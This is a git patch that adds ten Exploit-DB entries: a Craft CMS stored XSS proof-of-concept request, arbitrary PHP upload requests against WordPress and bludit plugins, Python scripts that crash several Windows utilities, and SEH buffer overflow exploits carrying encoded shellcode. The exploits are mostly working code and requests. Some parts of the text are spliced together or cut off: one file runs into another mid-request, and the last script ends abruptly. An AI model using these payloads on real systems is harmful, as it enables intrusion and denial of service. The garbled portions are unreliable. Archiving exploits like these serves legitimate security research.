From a6aa1db161ee4b442e92186d98f4723145d32fdb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Dec 2018 05:01:43 +0000 Subject: [PATCH] DB: 2018-12-28 10 changes to exploits/shellcodes Product Key Explorer 4.0.9 - Denial of Service (PoC) NetShareWatcher 1.5.8 - Denial of Service (PoC) ShareAlarmPro 2.1.4 - Denial of Service (PoC) MAGIX Music Editor 3.1 - Buffer Overflow (SEH) Terminal Services Manager 3.1 - Local Buffer Overflow (SEH) Iperius Backup 5.8.1 - Buffer Overflow (SEH) Craft CMS 3.0.25 - Cross-Site Scripting WordPress Plugin Audio Record 1.0 - Arbitrary File Upload bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload --- exploits/php/webapps/46054.txt | 39 ++++++++++++++++ exploits/php/webapps/46055.txt | 57 +++++++++++++++++++++++ exploits/php/webapps/46060.txt | 34 ++++++++++++++ exploits/php/webapps/46061.txt | 40 ++++++++++++++++ exploits/windows_x86/dos/46057.py | 46 ++++++++++++++++++ exploits/windows_x86/dos/46062.py | 31 +++++++++++++ exploits/windows_x86/dos/46063.py | 29 ++++++++++++ exploits/windows_x86/local/46056.py | 72 +++++++++++++++++++++++++++++ exploits/windows_x86/local/46058.py | 61 ++++++++++++++++++++++++ exploits/windows_x86/local/46059.py | 64 +++++++++++++++++++++++++ files_exploits.csv | 10 ++++ 11 files changed, 483 insertions(+) create mode 100644 exploits/php/webapps/46054.txt create mode 100644 exploits/php/webapps/46055.txt create mode 100644 exploits/php/webapps/46060.txt create mode 100644 exploits/php/webapps/46061.txt create mode 100755 exploits/windows_x86/dos/46057.py create mode 100755 exploits/windows_x86/dos/46062.py create mode 100755 exploits/windows_x86/dos/46063.py create mode 100755 exploits/windows_x86/local/46056.py create mode 100755 exploits/windows_x86/local/46058.py create mode 100755 exploits/windows_x86/local/46059.py diff --git a/exploits/php/webapps/46054.txt b/exploits/php/webapps/46054.txt new file mode 100644 index 000000000..e6ba9451b --- /dev/null +++ b/exploits/php/webapps/46054.txt @@ -0,0 +1,39 @@ +# Exploit Title: Craft CMS 3.0.25 - Cross-Site Scripting +# Google Dork: N/A +# Date: 2018-12-20 +# Exploit Author: Raif Berkay Dincel +# Contact: www.raifberkaydincel.com +# More Details [1] : https://www.raifberkaydincel.com/craft-cms-3-0-25-cross-site-scripting-vulnerability.html +# More Details [2] : https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/blob/master/README.md +# Vendor Homepage: craftcms.com +# Vulnerable Software --> [ https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/raw/master/Craft-3.0.25.rar ] +# Affected Version: [ 3.0.25 ] +# CVE-ID: CVE-2018-20418 +# Tested on: Kali Linux / Linux Mint / Windows 10 + +# Vulnerable Parameter Type: POST +# Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry +# Attack Pattern: + +# Description + +Allows it to run a Cross-Site Scripting by saving a new title from the console tab. + +# Proof of Concepts: + +POST /admin-panel-path/index.php?p=admin/actions/entries/save-entry HTTP/1.1 +Host: IP:PORT +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Registered-Asset-Bundles: ,craft\web\assets\quickpost\QuickPostAsset,craft\web\assets\cp\CpAsset,craft\web\assets\d3\D3Asset,craft\web\assets\elementresizedetector\ElementResizeDetectorAsset,craft\web\assets\garnish\GarnishAsset,yii\web\JqueryAsset,craft\web\assets\jquerytouchevents\JqueryTouchEventsAsset,craft\web\assets\velocity\VelocityAsset,craft\web\assets\jqueryui\JqueryUiAsset,craft\web\assets\jquerypayment\JqueryPaymentAsset,craft\web\assets\datepickeri18n\DatepickerI18nAsset,craft\web\assets\picturefill\PicturefillAsset,craft\web\assets\selectize\SelectizeAsset,craft\web\assets\fileupload\FileUploadAsset,craft\web\assets\xregexp\XregexpAsset,craft\web\assets\fabric\FabricAsset,craft\web\assets\prismjs\PrismJsAsset,craft\redactor\assets\field\FieldAsset,craft\redactor\assets\redactor\RedactorAsset,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,craft\web\assets\matrix\MatrixAsset,craft\web\assets\recententries\RecentEntriesAsset,craft\web\assets\feed\FeedAsset,craft\web\assets\dashboard\DashboardAsset +X-Registered-Js-Files: ,IP:PORT/admin-panel-path/cpresources/210842f9/d3.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/8c97f5da/element-resize-detector.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/a3075e2f/jquery.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/28095e6a/jquery.mobile-events.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/b288a952/velocity.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/12b5557f/garnish.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/fc2132f7/jquery-ui.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/aeaf06ba/jquery.payment.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/6270e830/datepicker-tr.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/2fad62a8/picturefill.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7bd34f2c/selectize.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/37456356/jquery.fileupload.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/71bf0ba6/xregexp-all.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7f38141/fabric.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7dfc6a65/js/Craft.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/92be564/QuickPostWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/2a8f54e3/prism.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/redactor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/lang/tr.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/PluginBase.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImageEditor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImages.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetFiles.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftEntryLinks.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorOverrides.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,IP:PORT/admin-panel-path/cpresources/2fd586d6/MatrixInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/5938f19a/RecentEntriesWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/ff3b78b9/FeedWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/86785e72/Dashboard.min.js?v=1545257412 +X-CSRF-Token: 3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo= +Content-Length: 857 +Connection: close +Cookie: _ga=GA1.2.143638489.1545256652; _gid=GA1.2.362987822.1545256652; 1031b8c41dfff97a311a7ac99863bdc5_identity=3fe8168bce4c48f844d43d3855ef833d47ba56edc78686d732690216a40a7ee6a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A243%3A%22%5B%221%22%2C%22%5B%5C%226wiT39UWdaEONl4iVMf6YZKo0TXsitqlapyaB4s1w9PJxkC3lUIyQsTP12pW0NLCU03hRa_X8SAglzpjlTUJh47RcOcmjgBQE9uO%5C%22%2C%5C%2212a6fb6b-eb72-44c3-b890-6c71b8d2bb88%5C%22%2C%5C%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A64.0%29+Gecko%2F20100101+Firefox%2F64.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=2365234bf6c8d0bafa98169137b93dc9e6af973d5135b3f0dd94d23d71c923d2a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; CraftSessionId=asetaditigin2tb5uerlivl8h7; CRAFT_CSRF_TOKEN=f4c4ded0838271c4ba50e1e2953119ff3b266d2cedaeba1984823672a14f6e71a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7Ca6cfc948987f6fa5745a965899bdadc6ed38ce0c9b259fcaaa124e258d3f0f97UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; _gat=1 +Cache-Control: no-transform + +enabled=1&fieldsLocation=fields1428173416&CRAFT_CSRF_TOKEN=3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo%3D&title=%3Cscript%3Ealert("Raif_XSS")%3C%2Fscript%3E&fields1428173416%5BfeaturedImage%5D=&fields1428173416%5BshortDescription%5D=&fields1428173416%5Bheading%5D=&fields1428173416%5Bsubheading%5D=&fields1428173416%5BarticleBody%5D=§ionId=2&typeId=2 \ No newline at end of file diff --git a/exploits/php/webapps/46055.txt b/exploits/php/webapps/46055.txt new file mode 100644 index 000000000..be763b7c2 --- /dev/null +++ b/exploits/php/webapps/46055.txt @@ -0,0 +1,57 @@ +# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload +# Date: 2018-12-24 +# Software Link: https://wordpress.org/plugins/audio-record/ +# Exploit Author: Kaimi +# Website: https://kaimi.io +# Version: 1.0 +# Category: webapps + +# Unrestricted file upload in record upload process allowing arbitrary extension. +# File: recorder.php +# Vulnerable code: +function save_record_callback() { + + foreach(array('audio') as $type) { + if (isset($_FILES["${type}-blob"])) { + + $fileName = uniqid() . '_' .$_POST["${type}-filename"] ; + $path_array = wp_upload_dir(); + $path = str_replace('\\', '/', $path_array['path']); + $uploadDirectory = $path . "/$fileName"; + if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) { + echo 000; + wp_die("problem moving uploaded file"); + } + + +# Exploitation example: + +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: example.com +Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851 +... +-----------------------------18311719029180117571501079851 +Content-Disposition: form-data; name="audio-filename" + +file.php +-----------------------------18311719029180117571501079851 +Content-Disposition: form-data; name="audio-blob"; filename="blob" +Content-Type: audio/wav + + + +-----------------------------26228568510541774541866388118-- \ No newline at end of file diff --git a/exploits/php/webapps/46061.txt b/exploits/php/webapps/46061.txt new file mode 100644 index 000000000..924b533bf --- /dev/null +++ b/exploits/php/webapps/46061.txt @@ -0,0 +1,40 @@ +# Exploit Title: WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload +# Date: 2018-12-24 +# Software Link: https://wordpress.org/plugins/baggage-freight/ +# Exploit Author: Kaimi +# Website: https://kaimi.io +# Version: 0.1.0 +# Category: webapps + +# Unrestricted file upload for unahtorized user in package info upload +# process allowing arbitrary extension. + +File: upload-package.php + +Vulnerable code: +if($_POST["submit"]) +{ + if ($_FILES["file"]) + { + $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"]; + + move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath); + +# Exploitation example: + +POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1 +Host: example.com +Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851 +... +-----------------------------18311719029180117571501079851 +Content-Disposition: form-data; name="submit" + +1 +-----------------------------18311719029180117571501079851 +Content-Disposition: form-data; name="file"; filename="file.php" +Content-Type: audio/wav + + Register... in tool bar +# 4. Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field +# 5. Click OK and BOOMMMM !!!! + +#!/usr/bin/python + +buffer = "\x41" * 2000 +buffer += "\x42" * 2000 +buffer += "\x43" * 1000 + +payload = buffer +try: + f=open("PoC.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/46062.py b/exploits/windows_x86/dos/46062.py new file mode 100755 index 000000000..91c4afa9e --- /dev/null +++ b/exploits/windows_x86/dos/46062.py @@ -0,0 +1,31 @@ +# Exploit Title: NetShareWatcher 1.5.8 - Denial of Service (PoC) +# Date: 2018-12-25 +# Exploit Author: T3jv1l +# Vendor Homepage: :http://www.nsauditor.com +# Software: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe +# Contact: https://twitter.com/T3jv1l +# Version: NetShareWatcher 1.5.8 +# Tested on: Windows 7 SP1 x86 +# Other software from the vendor affected +# Software: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe + +# PoC: +# 1. Download and install the setup file +# 2. A file "PoC.txt" will be created +# 3. Click Help > Register... in tool bar +# 4. Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field +# 5. Click OK and BOOMMMM !!!! + +#!/usr/bin/python + +buffer = "\x41" * 5256 + +payload = buffer +try: + f=open("PoC.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/46063.py b/exploits/windows_x86/dos/46063.py new file mode 100755 index 000000000..8c4a3452f --- /dev/null +++ b/exploits/windows_x86/dos/46063.py @@ -0,0 +1,29 @@ +# Exploit Title:ShareAlarmPro 2.1.4 - Denial of Service (PoC) +# Date: 2018-12-25 +# Exploit Author: T3jv1l +# Vendor Homepage: :http://www.nsauditor.com +# Software: http://sharealarm.nsauditor.com/downloads/sharealarmpro_setup.exe +# Contact: https://twitter.com/T3jv1l +# Version:ShareAlarmPro 2.1.4 +# Tested on: Windows 7 SP1 x86 + +# PoC: +# 1. Download and install the setup file +# 2. A file "PoC.txt" will be created +# 3. Click Help > Register... in tool bar +# 4. Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field +# 5. Click OK and BOOMMMM !!!! + +#!/usr/bin/python + +buffer = "\x41" * 5000 + +payload = buffer +try: + f=open("PoC.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/local/46056.py b/exploits/windows_x86/local/46056.py new file mode 100755 index 000000000..ea7b8c663 --- /dev/null +++ b/exploits/windows_x86/local/46056.py @@ -0,0 +1,72 @@ +# Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH) +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Date: 2018-12-24 +# Vulnerable Software: MAGIX Music Editor 3.1 +# Vendor Homepage: https://www.magix.com/us/ +# Version: 3.1 +# Software Link: https://www.magix.com/us/music/mp3-deluxe/ +# Music Editor Software is bundled with MP3 Deluxe 19 +# Tested Windows 7 SP1 x86 + +# PoC +# 1. run script +# 2. open music editor 3 +# 3. go to CD > freedb options > FreeDB Proxy Options +# 4. copy/paste magix.txt contents into Server field +# 5. select Accept settings +# 6. pop calc + +#!/usr/bin/python + +filename="magix.txt" + +#lol +junk = "A"*420 + +#jump 6 +nseh = "\xeb\x06\xcc\xcc" + +#0x10015b08 : pop ecx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [dac3x.dll] +seh = "\x08\x5b\x01\x10" + +#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00" -e x86/alpha_mixed -f c +#Payload size: 447 bytes +calc = ("\xda\xd4\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" +"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" +"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" +"\x4c\x4b\x58\x4b\x32\x67\x70\x55\x50\x45\x50\x45\x30\x6e\x69" +"\x6b\x55\x54\x71\x49\x50\x65\x34\x6c\x4b\x72\x70\x70\x30\x6e" +"\x6b\x76\x32\x46\x6c\x6c\x4b\x43\x62\x65\x44\x4e\x6b\x50\x72" +"\x64\x68\x66\x6f\x58\x37\x52\x6a\x31\x36\x45\x61\x4b\x4f\x6e" +"\x4c\x67\x4c\x43\x51\x61\x6c\x75\x52\x34\x6c\x51\x30\x6b\x71" +"\x7a\x6f\x56\x6d\x45\x51\x78\x47\x7a\x42\x4c\x32\x56\x32\x56" +"\x37\x6e\x6b\x32\x72\x42\x30\x4e\x6b\x32\x6a\x37\x4c\x6c\x4b" +"\x72\x6c\x67\x61\x61\x68\x4a\x43\x30\x48\x73\x31\x6b\x61\x66" +"\x31\x6e\x6b\x43\x69\x57\x50\x46\x61\x5a\x73\x4c\x4b\x51\x59" +"\x42\x38\x4d\x33\x37\x4a\x30\x49\x6e\x6b\x46\x54\x6c\x4b\x76" +"\x61\x68\x56\x65\x61\x4b\x4f\x4c\x6c\x5a\x61\x78\x4f\x56\x6d" +"\x56\x61\x58\x47\x65\x68\x4b\x50\x53\x45\x48\x76\x37\x73\x71" +"\x6d\x78\x78\x55\x6b\x31\x6d\x44\x64\x64\x35\x59\x74\x72\x78" +"\x4c\x4b\x31\x48\x66\x44\x36\x61\x6a\x73\x70\x66\x6e\x6b\x74" +"\x4c\x42\x6b\x6e\x6b\x46\x38\x57\x6c\x36\x61\x38\x53\x6c\x4b" +"\x64\x44\x6c\x4b\x46\x61\x5a\x70\x6d\x59\x32\x64\x61\x34\x46" +"\x44\x53\x6b\x61\x4b\x63\x51\x36\x39\x31\x4a\x52\x71\x69\x6f" +"\x4b\x50\x71\x4f\x61\x4f\x70\x5a\x6e\x6b\x66\x72\x78\x6b\x6c" +"\x4d\x31\x4d\x31\x7a\x43\x31\x4e\x6d\x4b\x35\x68\x32\x47\x70" +"\x65\x50\x65\x50\x36\x30\x62\x48\x54\x71\x4c\x4b\x42\x4f\x4f" +"\x77\x59\x6f\x4e\x35\x4d\x6b\x68\x70\x68\x35\x4d\x72\x52\x76" +"\x30\x68\x4e\x46\x5a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4a\x75\x35" +"\x6c\x46\x66\x73\x4c\x75\x5a\x4d\x50\x69\x6b\x79\x70\x51\x65" +"\x76\x65\x6f\x4b\x33\x77\x74\x53\x31\x62\x70\x6f\x73\x5a\x33" +"\x30\x76\x33\x39\x6f\x58\x55\x30\x63\x75\x31\x52\x4c\x73\x53" +"\x36\x4e\x52\x45\x53\x48\x32\x45\x65\x50\x41\x41") + +fill = "C"*2000 + +buffer = junk + nseh + seh + calc + fill + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows_x86/local/46058.py b/exploits/windows_x86/local/46058.py new file mode 100755 index 000000000..0bef80597 --- /dev/null +++ b/exploits/windows_x86/local/46058.py @@ -0,0 +1,61 @@ +# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH) +# Date: 2018-12-25 +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Vulnerable Software: Terminal Services Manager 3.1 +# Vendor Homepage: https://lizardsystems.com +# Version: 3.1 +# Software Link: https://lizardsystems.com/download/tsmanager_setup.exe +# Tested Windows 7 SP1 x86 + +# Other affected software from the vendor +# Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe +# Software Link: https://lizardsystems.com/download/rshutdown_setup.exe +# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe + +# PoC +# 1. run script +# 2. run add computers wizard +# 3. select import from files +# 4. paste tsmang.txt into computer names field +# 5. pop calc + +#bad chars \x00\x0d\x0e + +#!/usr/bin/python + +import struct + +junk2 = "A"*100 +junk1 = "B"*74 +jmp2 = "\xe9\x71\xfe\xff\xff\xcc" +jmp1 = "\xeb\xf8\xcc\xcc" + +#0x0049709f : pop esi # pop ebx # ret tsmanager.exe +seh = struct.pack('